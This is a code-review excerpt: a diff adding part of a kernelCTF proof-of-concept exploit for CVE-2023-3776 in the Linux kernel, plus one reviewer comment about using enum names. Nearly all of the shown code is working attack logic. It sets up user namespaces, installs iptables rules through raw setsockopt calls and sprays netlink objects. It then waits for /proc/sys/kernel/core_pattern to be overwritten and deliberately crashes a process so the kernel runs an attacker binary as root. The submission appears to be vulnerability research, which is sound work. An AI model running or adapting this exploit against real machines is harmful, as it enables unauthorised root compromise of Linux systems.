pocs/linux/kernelctf/CVE-2023-3776_cos_mitigation/exploit/mitigation-6.1/poc.c

```diff
@@ -0,0 +1,271 @@
+    0x0005002900000024, 0x00000000649bcb96,
+    0x0000000100000000, 0x0001000000010010,
+    0x0000000000000000};
+
+size_t payment[] = {
+    0x0201010100000024, 0x0000000000000000, 0x0008000800000000, 0x0015000858df0300, 0x00feffff};
+
+int check_core()
+{
+    // Check if /proc/sys/kernel/core_pattern has been overwritten
+    char buf[0x100] = {};
+    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+    read(core, buf, sizeof(buf));
+    close(core);
+    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+void crash(char *cmd)
+{
+    int memfd = memfd_create("", 0);
+    SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
+    dup2(memfd, 666);
+    close(memfd);
+    while (check_core() == 0)
+        sleep(1);
+    /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */
+    *(size_t *)0 = 0;
+}
+void unshare_setup(uid_t uid, gid_t gid)
+{
+    int temp, ret;
+    char edit[0x100];
+    ret = unshare(CLONE_NEWNET | CLONE_NEWUSER);
+    if (ret < 0)
+    {
+        perror("unshare");
+    }
+    temp = open("/proc/self/setgroups", O_WRONLY);
+    write(temp, "deny", strlen("deny"));
+    close(temp);
+    temp = open("/proc/self/uid_map", O_WRONLY);
+    snprintf(edit, sizeof(edit), "0 %d 1", uid);
+    write(temp, edit, strlen(edit));
+    close(temp);
+    temp = open("/proc/self/gid_map", O_WRONLY);
+    snprintf(edit, sizeof(edit), "0 %d 1", gid);
+    write(temp, edit, strlen(edit));
+    close(temp);
+    return;
+}
+
+int main(int argc, char **argv)
+{
+    if (fork() == 0) // this process is used to find our process by `pidof billy`
+    {
+        set_cpu(1);
+        strcpy(argv[0], "billy");
+        while (1)
+            sleep(1);
+    }
+    if (fork() == 0) // this process is used to trigger core_pattern exploit
+    {
+        set_cpu(1);
+        setsid();
+        crash("");
+    }
+    setvbuf(stdout, 0, 2, 0);
+    unshare_setup(getuid(), getgid());
+    socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
+    socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd);
+    struct rlimit rlim = {
+        .rlim_cur = 0xf000,
+        .rlim_max = 0xf000};
+    setrlimit(RLIMIT_NOFILE, &rlim);
+
+    // iptables-legacy -t mangle -A POSTROUTING -d 127.0.0.1/24 -j MARK --set-mark 1
+    {
+        set_cpu(1);
+        int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+        int fd = open("./ip0", O_RDONLY);
+        int n = read(fd, buf, 0x1000);
+        setsockopt(s, 0, 64, buf, n);
+        fd = open("./ip1", O_RDONLY);
+        n = read(fd, buf, 0x1000);
+        setsockopt(s, 0, 65, buf, n);
+        set_cpu(0);
+    }
+
+    char *core = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
+    strcpy(core, "|/proc/%P/fd/666"); // put payload string into known address which will used by ebpf shellcode
+
+    int sp = socket(0x10ul, 3ul, 0xc); // later use this socket to spray struct ctnetlink_filter 
```

Comment:
Please use enum names instead of values (AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER).